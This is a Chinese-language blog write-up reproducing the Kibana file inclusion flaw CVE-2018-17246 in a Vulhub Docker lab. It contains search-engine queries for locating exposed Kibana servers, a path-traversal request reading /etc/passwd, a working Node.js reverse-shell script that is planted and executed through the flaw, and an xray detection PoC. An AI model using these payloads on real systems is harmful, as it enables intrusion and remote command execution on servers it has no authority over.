Kibana本地文件包含漏洞(CVE-2018-17246)

Web漏洞 / Web应用漏洞 / Kibana
字数统计: 627   |   阅读时长≈ 2 分钟

Kibana本地文件包含漏洞(CVE-2018-17246)

漏洞描述

Kibana 为 Elassticsearch 设计的一款开源的视图工具。其5.6.13到6.4.3之间的版本存在一处文件包含漏洞,通过这个漏洞攻击者可以包含任意服务器上的文件。此时,如果攻击者可以上传一个文件到服务器任意位置,即可执行代码。

影响版本

1
2
ElasticSearch Kibana < 6.4.3
ElasticSearch Kibana < 5.6.13

搜索规则

zoomeye:

1
app:"kibana"

Fofa:

1
app="kibana"

漏洞复现

环境搭建

使用Vulhub集成漏洞环境进行搭建,命令如下:

1
2
3
cd vulhub-master/kibana/CVE-2018-17246
 
docker-compose up -d

kibana默认端口为5601,环境搭建成功后访问Kibana默认首页。

复现流程

漏洞探测

这里通过设置apis参数为需要包含的文件,这里设置为/etc/passwd文件

1
http://192.168.211.129:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd

可以看到服务器响应500

1
docker-compose logs

查看kibana的日志,可以看到/etc/passwd文件已经被包含

漏洞利用

这里我们写个反弹shell的js语句,将其放到kibana的docker镜像中

js代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/bash", []);
    var client = new net.Socket();
    client.connect(12345, "127.0.0.1", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/;
})();

将本地创建的文件复制到kibana镜像中的/tmp/shell.js文件

命令:

1
docker cp 你的文件路径 容器长ID:docker容器路径

进入kibana控制台命令:

1
docker-compose  exec   kibana  bash

可以看到复制文件成功

在浏览器中访问创建的shell.js文件

文件包含成功,js语句执行成功,反弹shell

漏洞poc

xray-poc:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
name: poc-yaml-kibana-cve-2018-17246
rules:
  - method: GET
    path: /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
    follow_redirects: false
    expression: |
      response.headers["kbn-name"] == "kibana" && response.content_type.contains("application/json") && response.body.bcontains(bytes("\"statusCode\":500")) && response.body.bcontains(bytes("\"message\":\"An internal server error occurred\""))
detail:
  author: canc3s(https://github.com/canc3s)
  kibana_version: before 6.4.3 and 5.6.13
  links:
    - https://nvd.nist.gov/vuln/detail/CVE-2018-17246
    - https://github.com/vulhub/vulhub/blob/master/kibana/CVE-2018-17246/README.md

参考文章

(44条消息) 完美拷贝本地文件到docker容器_大唐锦绣的博客-CSDN博客_拷贝文件到docker容器

(44条消息) Kibana本地文件包含漏洞(CVE-2018-17246)_大方子-CSDN博客

打赏
  • 版权声明: 本博客所有文章除特别声明外,著作权归作者所有。转载请注明出处!
  • Copyrights © 2021-2024 John Doe
  • 访问人数: | 浏览次数:

让我给大家分享喜悦吧!

微信